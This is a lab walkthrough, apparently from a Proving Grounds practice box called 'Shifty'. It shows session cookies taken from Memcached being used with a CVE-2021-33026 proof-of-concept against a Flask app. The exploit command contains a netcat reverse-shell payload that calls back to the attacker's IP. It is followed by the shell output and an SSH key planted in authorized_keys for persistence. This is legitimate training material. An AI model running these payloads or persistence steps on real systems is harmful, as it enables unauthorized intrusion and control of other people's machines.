CVE-2021-33026
During the enumeration of the Memcached service running on the target system’s port 11211, it was discovered that slab 3 contains session cookies stored as items. Both the web application on port 80 and the Flask application on port 5000 utilize the same type of session cookies. However, the Flask application presents a higher security risk due to the known vulnerability identified as CVE-2021-33026.
Acquiring Session Cookie
/Practice/Shifty/3-Exploitation/attachments/{762C5795-D799-4445-8EE3-E6774185120F}.png)
/Practice/Shifty/3-Exploitation/attachments/{F161A9ED-B1EF-4510-A2B2-7BD606A63DC2}.png)
First, a valid session cookie is required; session=e198fe78-89d9-4115-bb59-eb9c66f6615f
Exploitation
┌──(.venv)─(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shifty]
└─$ python3 CVE-2021-33026/cve-2021-33026_PoC.py --rhost $IP --rport 5000 --cookie "session:e198fe78-89d9-4115-bb59-eb9c66f6615f" --cmd 'mkfifo /tmp/crmj; nc 192.168.45.153 5000 0</tmp/crmj | /bin/sh >/tmp/crmj 2>&1; rm /tmp/crmj'
____ ___ ____ _ ___ _____
| _ \_ _/ ___| |/ / | | ____|
| |_) | | | | ' /| | | _| _____
| __/| | |___| . \| |___| |___ |_____|
|_| |___\____|_|\_\_____|_____|
__ __ _____ __ __ ____ _ ____ _ _ _____ ____
| \/ | ____| \/ |/ ___| / \ / ___| | | | ____| _ \
| |\/| | _| | |\/| | | / _ \| | | |_| | _| | | | |
| | | | |___| | | | |___ / ___ \ |___| _ | |___| |_| |
|_| |_|_____|_| |_|\____/_/ \_\____|_| |_|_____|____/
____ ___ ___ ____ ___ _ _ ___ _ _ ____
| _ \ / _ \_ _/ ___| / _ \| \ | |_ _| \ | |/ ___|
| |_) | | | | |\___ \| | | | \| || || \| | | _
| __/| |_| | | ___) | |_| | |\ || || |\ | |_| |
|_| \___/___|____/ \___/|_| \_|___|_| \_|\____|
Sucess!Executing the exploit script with the payload
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shifty]
└─$ nnc 5000
listening on [any] 5000 ...
connect to [192.168.45.153] from (UNKNOWN) [192.168.219.59] 51472
whoami
jerry
hostname
shifty
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
2: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:9e:d3:9d brd ff:ff:ff:ff:ff:ff
inet 192.168.219.59/24 brd 192.168.219.255 scope global ens192
valid_lft forever preferred_lft foreverInitial Foothold established to the target system as the jerry user via exploiting CVE-2021-33026
jerry@shifty:/opt/backups$ echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoUoI9LYwEoMSDFaLZNQ51dLFNZf27nQjV7fooImm5g kali@kali' > ~/.ssh/authorized_keys
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shifty]
└─$ ssh jerry@$IP -i ~/.ssh/id_ed25519
The authenticity of host '192.168.219.59 (192.168.219.59)' can't be established.
ED25519 key fingerprint is SHA256:m7DIwMEn9vAjxI8NfQb2e2QAj3ezJ23F8hgt8bGLOOM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.219.59' (ED25519) to the list of known hosts.
Enter passphrase for key '/home/kali/.ssh/id_ed25519':
Linux shifty 4.9.0-12-amd64 #1 SMP Debian 4.9.210-1+deb9u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
jerry@shifty:~$ SSH